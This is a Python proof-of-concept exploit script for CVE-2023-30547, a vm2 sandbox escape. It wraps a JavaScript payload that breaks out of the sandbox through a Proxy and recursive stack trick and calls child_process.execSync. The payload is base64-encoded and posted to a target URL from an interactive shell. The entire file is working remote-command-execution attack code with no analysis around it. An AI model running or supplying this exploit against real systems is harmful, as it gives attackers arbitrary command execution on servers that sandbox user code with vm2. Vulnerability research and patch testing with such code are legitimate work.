exploit.py

#!/bin/python3

import requests
import base64
import sys
import cmd
import readline
import json

# CVE-2023-30547 - PoC Exploit for VM2 Sandbox Escape Vulnerability
# Author : Ravindu Wickramasinghe | rvz 

class ExploitShell(cmd.Cmd):
    def __init__(self, url):
        super().__init__()
        self.url = url

    def default(self, line):
        cmd = line
        payload = '''const {VM} = require("vm2");
        const vm = new VM();

        const code = `
        cmd = "'''+cmd+'''";
        err = {};
        const handler = {
            getPrototypeOf(target) {
                (function stack() {
                    new Error().stack;
                    stack();
                })();
            }
        };
        
        const proxiedErr = new Proxy(err, handler);
        try {
            throw proxiedErr;
        } catch ({constructor: c}) {
            c.constructor('return process')().mainModule.require('child_process').execSync(cmd);
        }
        `
        console.log(vm.run(code));'''
        encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')

        # update if needed
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
            'Accept': '*/*',
            'Accept-Language': 'en-US,en;q=0.5',
            'Content-Type': 'application/json',
            'Connection': 'keep-alive',
        }

        # update if needed
        json_data = {'code': encoded_payload}

        try:
            response = requests.post(self.url, headers=headers, json=json_data)
        except:
            print("[!] an error occurred!")
            return
        try:
            values = list(json.loads(response.text).values())
            print(values[0])
        except json.JSONDecodeError:
            print(response.text)

    def do_exit(self, args):
        print("exiting...")
        return True

def main():
    try:
        url = sys.argv[1]
    except IndexError:
        print("usage: ./exploit.py <url>")
        sys.exit(1)

    shell = ExploitShell(url)
    shell.prompt = "> "
    shell.cmdloop()

if __name__ == "__main__":
    main()